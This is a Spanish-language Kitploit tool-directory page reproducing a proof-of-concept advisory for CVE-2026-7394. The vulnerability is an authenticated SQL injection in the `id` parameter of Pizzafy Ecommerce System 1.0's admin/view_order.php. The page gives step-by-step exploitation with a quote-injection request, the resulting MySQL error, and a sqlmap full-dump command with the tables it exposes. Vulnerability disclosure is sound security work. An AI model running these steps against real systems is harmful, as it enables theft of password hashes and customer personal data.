Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-7394-SQLI — Exploit de prueba de concepto para CVE-2026-7394, una vulnerabilidad de inyección SQL en SourceCodester Pizzafy Ecommerce System 1.0. Demuestra inyección SQL de administrador autenticado a través del parámetro `id` en `admin/view_order.php`, lo que permite el volcado completo de la base de datos, incluidas las credenciales de usuario y la información personal identificable (PII). | Kitploit
Herramientas/GitHubGitHub/xmyronn/cve-2026-7394-sqli
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ver Repositorio
hace 3 mesesAún no revisado

Exploit de prueba de concepto para CVE-2026-7394, una vulnerabilidad de inyección SQL en SourceCodester Pizzafy Ecommerce System 1.0. Demuestra inyección SQL de administrador autenticado a través del parámetro `id` en `admin/view_order.php`, lo que permite el volcado completo de la base de datos, incluidas las credenciales de usuario y la información personal identificable (PII).

Compartir

Inyección SQL en Pizzafy Ecommerce System — admin/view_order.php

Detalles

CampoValor
ProveedorSourceCodester
ProductoPizzafy Ecommerce System desarrollado con PHP y MySQL
Versión1.0
VulnerabilidadInyección SQL
CWECWE-89
Puntuación CVSSv37.2 (Alta)
Vector de ataqueRed
Autenticación requeridaSí (Administrador)
InvestigadorXmyronn
Fecha2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


Componente afectado

Archivo: Pizzafy/admin/view_order.php
Parámetro: id (GET)


Descripción

El endpoint admin/view_order.php de Pizzafy Ecommerce System 1.0 no sanea correctamente el parámetro GET id antes de pasarlo a una consulta MySQL. Un administrador autenticado puede manipular este parámetro para inyectar SQL arbitrario, lo que conduce al compromiso total de la base de datos.


Prueba de concepto

Paso 1 — Iniciar sesión como administrador

Navegue a:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

Inicie sesión con las credenciales de administrador.

Paso 2 — Navegar a Pedidos

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Screenshot 2026-04-11 212106

Haga clic en View Order en cualquier entrada de pedido. Screenshot 2026-04-11 212116

Paso 3 — Interceptar la solicitud en Burp Suite

La solicitud GET interceptada se ve así: Screenshot 2026-04-11 212135

Paso 4 — Provocar el error SQL

Cambie id=1 por id=': Screenshot 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

Respuesta — error de MySQL expuesto:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

Paso 5 — Explotar con sqlmap

Guarde la solicitud en view_order.txt y ejecute:

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
Screenshot 2026-04-11 212406

sqlmap confirmó los tipos de inyección:

TipoTítulo
Boolean-based blindAND boolean-based blind — WHERE clause
Error-basedMySQL >= 5.0 FLOOR error-based
Time-based blindMySQL >= 5.0.12 SLEEP
UNION queryGeneric UNION query — 11 columns

Se volcó la base de datos completa:

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

Los datos sensibles expuestos incluyen hashes de contraseñas bcrypt, correos electrónicos de clientes, detalles de pedidos y la configuración del sistema.


Impacto

Un administrador autenticado malintencionado (o un atacante que haya obtenido credenciales de administrador) puede:

  • Volcar la base de datos completa, incluidos los hashes de contraseñas
  • Leer PII sensible de los clientes (nombres, correos electrónicos, direcciones, números de teléfono)
  • Escribir potencialmente en la base de datos

Referencias

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-89: Neutralización incorrecta de elementos especiales utilizados en un comando SQL.
Descargar herramienta